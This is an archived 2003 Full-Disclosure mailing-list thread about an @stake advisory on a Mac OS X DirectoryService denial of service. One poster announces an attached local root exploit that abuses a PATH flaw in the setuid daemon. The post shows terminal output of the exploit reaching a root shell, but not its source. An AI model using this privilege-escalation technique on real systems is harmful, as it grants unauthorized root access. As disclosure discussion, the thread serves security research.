Re: [Full-Disclosure] OS X DirectoryService DoS {@stake adv:

From: Neeko Oni (neeko@haackey.com)
Date: 04/18/03

  • Next message: Blue Boar: "[Full-Disclosure] Another credit card scam, site appears to still be active"
    From: Neeko Oni <neeko@haackey.com>
    To: full-disclosure@lists.netsys.com
    Date: Thu, 17 Apr 2003 22:15:35 -0700 (PDT)
    

    Hoping to encourage people to figure out what @stake was talking about
    in regards to the OS X DirectoryService DoS, I've attached a local
    exploit for DirectoryService _once is has been crashed/killed_.

    [sera:~] loser% gcc osxds.c -o touch
    [sera:~] loser% ./touch
    Original path: /bin:/sbin:/usr/bin:/usr/sbin
    New path: .
    Executing DirectoryService with false PATH...
    Forked DirectoryService, pausing before shell exec...
    sh: rm: command not found
    Cross your fingers.
    Path restored: /bin:/sbin:/usr/bin:/usr/sbin
    euid is root.
    root:~# id
    uid=0(root) gid=20(staff) groups=20(staff)
    root:~#

    >
    > Neeko Oni wrote:
    >
    > >Ok, the PATH problem is self-explanatory (and has been exploited once
    > the DirectoryService process has crashed) but I've had some difficulty
    > >reproducing the DoS attack claim. I've got a 10.2.4 machine sitting
    > >right next to me, I believe it's a stock install, but DirectoryService
    > >doesn't bind 625. DirectoryService doesn't bind any ports and
    > >furthermore nothing binds 625 at all.
    > >
    > >Has anyone reproduced the DoS in that advisory?
    >
    > I also read the advisory and of the two MacOS machines that I am able
    > to access (only one locally) I can confirm that on the machine that
    > I don't have local access there was a daemon running on port 625 and
    > as the advisory states I was able to reproduce the DoS attack. I'm
    > not sure exactly which version of MacOS X that machine was running
    > but the daemon did crash and and refuse connection.
    >
    > On the machine that I know for a fact is 10.2.4 and have local access to,
    > DirectoryService was setuid root and was running but there was no port
    > 625 open. I haven't port scanned the machine to check other ports yet
    > so i'm not ruling out the possibility its running on a different port
    > just yet.
    >
    > Has anyone else looked into this matter... ?
    >
    > -subversive
    > --
    > ______________________________________________
    > http://www.linuxmail.org/
    > Now with e-mail forwarding for only US$5.95/yr
    >
    > Powered by Outblaze
    >

    
    

    _______________________________________________
    Full-Disclosure - We believe in it.
    Charter: http://lists.netsys.com/full-disclosure-charter.html



  • Next message: Blue Boar: "[Full-Disclosure] Another credit card scam, site appears to still be active"

    Relevant Pages

    • Re: [Full-Disclosure] OS X DirectoryService DoS {@stake adv: a041003-1}
      ... >reproducing the DoS attack claim. ... >right next to me, I believe it's a stock install, but DirectoryService ... as the advisory states I was able to reproduce the DoS attack. ... DirectoryService was setuid root and was running but there was no port ...
      (Full-Disclosure)
    • Re: Can DOSEMU drive par-port ?
      ... > I believe that dosemu.bin has to be suid root or you need to run it as ... I need to drive I/O port 0x378 directily. ... but failed to measure port output - as I do on a DOS box. ... I'll just have to move the data via fd0 to a DOS box for use ...
      (comp.os.linux.misc)
    • Re: Can DOSEMU drive par-port ?
      ... > I believe that dosemu.bin has to be suid root or you need to run it as ... I need to drive I/O port 0x378 directily. ... but failed to measure port output - as I do on a DOS box. ... I'll just have to move the data via fd0 to a DOS box for use ...
      (comp.os.linux.hardware)